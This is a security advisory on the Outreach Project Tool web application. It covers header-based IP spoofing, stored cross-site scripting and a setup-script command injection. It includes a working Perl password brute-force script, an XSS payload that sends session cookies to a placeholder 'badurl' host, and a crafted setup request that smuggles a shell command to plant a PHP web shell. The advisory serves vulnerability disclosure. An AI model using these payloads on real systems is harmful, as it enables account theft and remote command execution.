|
COMMAND Outreach Project Tool issues SYSTEMS AFFECTED O.P.T Version opt_0.946b / Earlier versions may be vulnerable too PROBLEM In an advisory by Martin Eiszner [mei@websec.org] of WebSec.org [http://www.websec.org] : The Outreach Project Tool was developed by CSO Lanifex GmbH to support communication with customers during project implementat ion. It has rapidly evolved into a highly effective Web-based collaboration system, which improves interaction between consult ants and their clients, as well as a wide range of other applications. --snip-- 1) REQUEST-HEADER TARPIT - OUT-CHEAT The function "OPT_remote_IP()"(/opt/general.php) accepts "X_FORWARDED_FOR" and "VIA"- environment variables. This is done to identify possible proxy-servers. Unfortunately these variables are part of the HTTP-request headers. the follwoing http-request: ---*--- GET /opt/whatever HTTP/1.1 Host: whatever VIA: 1.2.3.4 ---*--- "$HTTP_VIA" will be used as the users IP. Thus leading to: -Anonymous use of the application -Possibility of a brute-force attack against accounts Simple example for a brute-force attack against OPT: ---cut here--- #!/usr/bin/perl use LWP::UserAgent; use HTTP::Request::Common; use HTTP::Response; my ($url,$uid,$pf) = @ARGV; open(P,"< $pf") || die "passf.?\n"; my $ua = LWP::UserAgent->new(requests_redirectable => ['POST']); # carefully ! while(<P>){ my $pwd = $_; chomp($pwd); my %h = ( VIA => (rand(255)%255).".".(rand(255)%255).".".(rand(255)%255).".".(rand(255)%255) ); my $res = $ua->request(HEAD "$url?lang=0&justlogged=1&username=$uid&password=$pwd&tz=+0200&button=Login now",%h); my $hds = $res->headers; my $new = $hds->header("Location"); my $res2 = $ua->request(GET "$new",%h); my $res2 = $ua->request(GET "$new",%h); # strange db-redirect stuff ?!! my $cod = $res2->code; my $pag = $res2->content; print "$uid:$pwd ".(($cod =~ /20\d/ && $pag !~ /is invalid/ig)?"\tYES":'')."\n"; } close (P); ---cut here--- 2) SEVERAL XSS VULNERABILITIES Help/Forums/and Others Typical XSS vulnerabilities exist in manny/most of the community-functions. Example: Once logged in ... goto "Notes -> News -> Ad News" Then create a News with scripting tags included: ---cut here--- hello i am a news thing .. bla bla ... <script> alert(document.cookie); </script> ---cut here--- Now every user gets now an alert window with his own session-id.(only as example!!) Of course it is possible to steal the OPT_Session by requesting another url where a so called cookie-theft is installed !! (location.href or window.open("http://badurl/theft?"+document.cookie,"a") ...) This vulnerability makes it possible once logged in to steal "any" other users accounts (administrator included !). 3) SETUP-ISSUES (/opt/setup) If the lockfile "lock01" in the setup_lock-directory is not removed due to wrong permission settings or someone is able/allowed to create a file "lock01" it is possible to: a) Create a new Setup b) Execute system-commands thru the setup.php - script. This is because the "temp_CRM_dir" parameter is passed directly to the PHP-exec function. Example GET-Request: ---cut here--- http://localhost/opt/setup/setup.php? CRM_email=opti@localhost &CRM_system_email=mei@localhost &CRM_path=/disk2/apps/opt/OPT_0.946b/opt &CRM_db_host=localhost&CRM_db_uname=opt &CRM_db_pwd=opt &CRM_db_db=opt &CRM_may_demo=0 &temp_CRM_dir=a;echo+-e+%5c074?passthru%5c050%5c044c%5c051?%5c076+%3E+bad.php; &CRM_mail_fname=OPT_incoming_mail &action=Set up my OPT server ---cut here--- Above will create a script called "bad.php" with content(<?passthru($c)?>)in the OPT-setup directory ! SOLUTION After installation check if file "lock01" exists in setup_lock-directory. if yes, remove it. The other vulnerabilities can only be fixed by sw-patches. (?)